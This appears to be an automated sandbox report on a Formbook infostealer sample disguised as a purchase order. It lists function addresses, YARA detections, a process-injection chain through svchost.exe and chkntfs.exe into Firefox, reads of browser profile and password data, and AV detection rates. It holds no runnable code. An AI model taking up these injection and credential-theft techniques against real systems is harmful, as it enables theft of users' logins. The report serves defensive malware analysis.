            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF132D1_2_02FF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF70E91_2_02FF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFF0E01_2_02FFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEF0CC1_2_02FEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F470C01_2_02F470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300B16B1_2_0300B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4B1B01_2_02F4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2F1721_2_02F2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7516C1_2_02F7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF16CC1_2_02FF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F856301_2_02F85630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFF7B01_2_02FFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F314601_2_02F31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFF43F1_2_02FFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030095C31_2_030095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDD5B01_2_02FDD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF75711_2_02FF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEDAC61_2_02FEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDDAAC1_2_02FDDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F85AA01_2_02F85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE1AA31_2_02FE1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB3A6C1_2_02FB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFFA491_2_02FFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF7A461_2_02FF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB5BF01_2_02FB5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7DBF91_2_02F7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5FB801_2_02F5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFFB761_2_02FFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F438E01_2_02F438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAD8001_2_02FAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F499501_2_02F49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5B9501_2_02F5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD59101_2_02FD5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F49EB01_2_02F49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F03FD21_2_02F03FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F03FD51_2_02F03FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFFFB11_2_02FFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F41F921_2_02F41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFFF091_2_02FFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFFCF21_2_02FFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB9C321_2_02FB9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5FDC01_2_02F5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF7D731_2_02FF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF1D5A1_2_02FF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F43D401_2_02F43D40
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C2E4F63_2_04C2E4F6
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C324463_2_04C32446
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C244203_2_04C24420
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C405913_2_04C40591
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B805353_2_04B80535
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B9C6E03_2_04B9C6E0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B7C7C03_2_04B7C7C0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B807703_2_04B80770
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BA47503_2_04BA4750
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C120003_2_04C12000
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C381CC3_2_04C381CC
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C341A23_2_04C341A2
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C401AA3_2_04C401AA
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C081583_2_04C08158
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B701003_2_04B70100
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C1A1183_2_04C1A118
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C002C03_2_04C002C0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C202743_2_04C20274
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C403E63_2_04C403E6
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B8E3F03_2_04B8E3F0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C3A3523_2_04C3A352
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B70CF23_2_04B70CF2
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C20CB53_2_04C20CB5
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B80C003_2_04B80C00
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B98DBF3_2_04B98DBF
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B7ADE03_2_04B7ADE0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B8AD003_2_04B8AD00
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C1CD1F3_2_04C1CD1F
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C3EEDB3_2_04C3EEDB
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B92E903_2_04B92E90
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C3CE933_2_04C3CE93
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B80E593_2_04B80E59
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C3EE263_2_04C3EE26
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BFEFA03_2_04BFEFA0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B72FC83_2_04B72FC8
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BA0F303_2_04BA0F30
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BC2F283_2_04BC2F28
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C22F303_2_04C22F30
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BF4F403_2_04BF4F40
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B668B83_2_04B668B8
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BAE8F03_2_04BAE8F0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B828403_2_04B82840
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B8A8403_2_04B8A840
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B829A03_2_04B829A0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C4A9A63_2_04C4A9A6
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B969623_2_04B96962
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B7EA803_2_04B7EA80
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C36BD73_2_04C36BD7
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C3AB403_2_04C3AB40
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B714603_2_04B71460
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C3F43F3_2_04C3F43F
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C495C33_2_04C495C3
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C1D5B03_2_04C1D5B0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C375713_2_04C37571
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C316CC3_2_04C316CC
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BC56303_2_04BC5630
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C3F7B03_2_04C3F7B0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C2F0CC3_2_04C2F0CC
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C3F0E03_2_04C3F0E0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C370E93_2_04C370E9
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B870C03_2_04B870C0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B8B1B03_2_04B8B1B0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C4B16B3_2_04C4B16B
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B6F1723_2_04B6F172
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BB516C3_2_04BB516C
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B852A03_2_04B852A0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C212ED3_2_04C212ED
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B9D2F03_2_04B9D2F0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B9B2C03_2_04B9B2C0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BC739A3_2_04BC739A
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C3132D3_2_04C3132D
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B6D34C3_2_04B6D34C
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C3FCF23_2_04C3FCF2
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BF9C323_2_04BF9C32
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B9FDC03_2_04B9FDC0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C31D5A3_2_04C31D5A
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C37D733_2_04C37D73
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B83D403_2_04B83D40
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B89EB03_2_04B89EB0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B81F923_2_04B81F92
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B43FD53_2_04B43FD5
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B43FD23_2_04B43FD2
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C3FFB13_2_04C3FFB1
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C3FF093_2_04C3FF09
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B838E03_2_04B838E0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BED8003_2_04BED800
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C159103_2_04C15910
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B899503_2_04B89950
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B9B9503_2_04B9B950
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C2DAC63_2_04C2DAC6
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BC5AA03_2_04BC5AA0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C21AA33_2_04C21AA3
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C1DAAC3_2_04C1DAAC
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C37A463_2_04C37A46
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C3FA493_2_04C3FA49
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BF3A6C3_2_04BF3A6C
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04B9FB803_2_04B9FB80
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BBDBF93_2_04BBDBF9
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04BF5BF03_2_04BF5BF0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_04C3FB763_2_04C3FB76
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_00991E203_2_00991E20
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0098CD103_2_0098CD10
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0098CD0A3_2_0098CD0A
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0098AFB03_2_0098AFB0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0098AFAE3_2_0098AFAE
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0098CF303_2_0098CF30
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_009954D03_2_009954D0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_009936B03_2_009936B0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_009936AC3_2_009936AC
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0099366A3_2_0099366A
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_009ABBD03_2_009ABBD0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_049ED7933_2_049ED793
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_049ED7C83_2_049ED7C8
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_049EE7603_2_049EE760
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_049EE2A83_2_049EE2A8
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_049E038E3_2_049E038E
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_049EE3C33_2_049EE3C3
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_049F532C3_2_049F532C
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_049ECA833_2_049ECA83
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F87E54 appears 107 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FBF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F2B970 appears 262 times
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: String function: 00F1F9F2 appears 31 times
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: String function: 00F20A30 appears 46 times
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: String function: 04BEEA12 appears 86 times
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: String function: 04B6B970 appears 262 times
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: String function: 04BB5130 appears 58 times
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: String function: 04BFF290 appears 103 times
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: String function: 04BC7E54 appears 107 times
            Source: PO_987654345678.exe, 00000000.00000003.1655961378.00000000039E3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO_987654345678.exe
            Source: PO_987654345678.exe, 00000000.00000003.1656065998.0000000003B8D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO_987654345678.exe
            Source: PO_987654345678.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4118474326.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1850488356.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4117493334.0000000000980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.4120389612.0000000005750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1850432991.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4118583359.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.4118512581.0000000003C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1850914338.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@17/11
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F737B5 GetLastError,FormatMessageW,0_2_00F737B5
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F610BF AdjustTokenPrivileges,CloseHandle,0_2_00F610BF
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F616C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00F616C3
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F751CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00F751CD
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F8A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00F8A67C
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F7648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_00F7648E
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F042A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00F042A2
            Source: C:\Users\user\Desktop\PO_987654345678.exeFile created: C:\Users\user\AppData\Local\Temp\autDA7C.tmpJump to behavior
            Source: PO_987654345678.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\PO_987654345678.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: chkntfs.exe, 00000003.00000002.4117707288.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.2029116161.0000000002EC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: PO_987654345678.exeVirustotal: Detection: 37%
            Source: PO_987654345678.exeReversingLabs: Detection: 42%
            Source: unknownProcess created: C:\Users\user\Desktop\PO_987654345678.exe "C:\Users\user\Desktop\PO_987654345678.exe"
            Source: C:\Users\user\Desktop\PO_987654345678.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO_987654345678.exe"
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeProcess created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PO_987654345678.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO_987654345678.exe"Jump to behavior
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exeProcess created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PO_987654345678.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\PO_987654345678.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\PO_987654345678.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\PO_987654345678.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\PO_987654345678.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\PO_987654345678.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PO_987654345678.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\PO_987654345678.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\PO_987654345678.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\PO_987654345678.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\PO_987654345678.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\PO_987654345678.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: ifsutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: sspicli.dllJump to behavior
